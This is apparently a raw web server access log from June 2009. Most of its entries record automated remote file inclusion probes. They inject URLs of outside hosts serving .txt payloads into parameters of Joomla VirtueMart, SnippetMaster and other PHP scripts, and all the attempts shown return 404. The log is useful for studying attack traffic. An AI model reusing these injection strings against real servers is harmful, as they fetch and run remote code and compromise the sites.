122.201.76.100 - - [08/Jun/2009:01:21:24 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
68.98.118.196 - - [08/Jun/2009:01:21:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L400CAD4922E282003C2E061+M37+ENG HTTP/1.1" 200 38031 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L400CAB462FC2E200D14E060+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
122.201.76.100 - - [08/Jun/2009:01:21:25 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
68.98.118.196 - - [08/Jun/2009:01:21:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L400CAD4629023200440E061+M37+ENG HTTP/1.1" 200 76254 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L400CAD4922E282003C2E061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)"
122.201.76.100 - - [08/Jun/2009:01:21:32 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:21:33 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:21:34 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:21:36 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:21:37 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:21:37 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:21:41 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
203.185.28.194 - - [08/Jun/2009:01:22:08 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:01:22:08 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:01:22:08 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:01:22:10 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:01:22:10 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:01:22:10 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:22:12 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:22:15 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:01:22:15 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:01:22:15 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:22:22 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:22:24 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:22:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
119.93.90.155 - - [08/Jun/2009:01:22:25 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:22:25 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:01:22:28 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:01:22:33 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:01:22:40 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:22:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:22:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
65.98.59.178 - - [08/Jun/2009:01:22:49 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:22:49 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.98.59.178 - - [08/Jun/2009:01:22:50 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:22:55 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:01:22:59 -0400] "GET /logs/access_log.Q109010700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:00 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:00 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:06 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:19 -0400] "GET /logs/access_log.Q109010700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:19 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
200.142.148.142 - - [08/Jun/2009:01:23:21 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:23:27 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
74.6.17.155 - - [08/Jun/2009:01:23:29 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.155 - - [08/Jun/2009:01:23:32 -0400] "GET /logs/ HTTP/1.0" 200 4634 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.165.10 - - [08/Jun/2009:01:23:38 -0400] "GET /apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:23:38 -0400] "GET /logs/apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:23:38 -0400] "GET /logs/access_log.Q109051100/apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:23:43 -0400] "GET /apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:23:43 -0400] "GET /logs/apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:23:43 -0400] "GET /logs/access_log.Q109051100/apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:23:51 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:55 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:23:56 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:24:02 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:01:24:04 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:24:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:24:05 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:24:07 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:01:24:18 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
200.142.148.142 - - [08/Jun/2009:01:24:19 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:24:20 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:24:21 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
91.184.52.8 - - [08/Jun/2009:01:24:31 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:24:31 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:24:31 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:24:33 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:24:33 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:24:33 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:24:55 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
91.184.52.8 - - [08/Jun/2009:01:24:59 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:24:59 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:01:25:32 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:25:32 -0400] "GET /logs/error_log.Q109010200//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:25:32 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
122.201.76.100 - - [08/Jun/2009:01:25:38 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:25:39 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:25:39 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:25:39 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:25:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:25:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:01:25:42 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:25:43 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:25:43 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
70.85.165.10 - - [08/Jun/2009:01:25:44 -0400] "GET /logs/access_log.Q109051100%20%20/apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:25:57 -0400] "GET /logs/access_log.Q109051100%20%20/apps/apps.php?app=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:01:26:01 -0400] "GET /logs/error_log.Q109010200//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:26:02 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:26:02 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
58.177.251.221 - - [08/Jun/2009:01:26:04 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:26:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:26:05 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
